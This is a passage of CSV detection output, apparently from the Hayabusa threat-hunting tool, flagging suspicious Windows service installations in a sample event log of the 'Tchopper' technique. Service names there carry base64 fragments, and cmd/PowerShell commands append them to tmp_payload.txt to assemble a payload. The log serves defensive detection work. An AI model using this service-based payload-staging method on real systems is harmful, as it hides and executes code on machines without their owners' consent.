RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:04.472 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 